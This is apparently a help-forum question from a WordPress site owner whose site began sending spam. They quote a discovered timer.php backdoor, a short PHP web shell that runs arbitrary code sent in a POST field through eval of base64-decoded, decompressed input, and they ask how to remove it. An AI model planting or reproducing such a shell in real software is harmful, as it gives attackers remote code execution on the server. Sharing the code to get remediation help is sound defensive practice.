Suddenly one of our Wordpress websites started sending spam emails and it was blacklisted on MXToolBox. So with the server support I scaned the files and found a strange file called timer.php
containing the following code block:
if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1")
{echo "200"; exit;}
if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="some code")
eval(gzuncompress(base64_decode($_POST["chk"])));
After some online research I have found out that this is malicious and a backdoor. What are the recommended actions I should take to mitigate this? Would deleting the file be enough?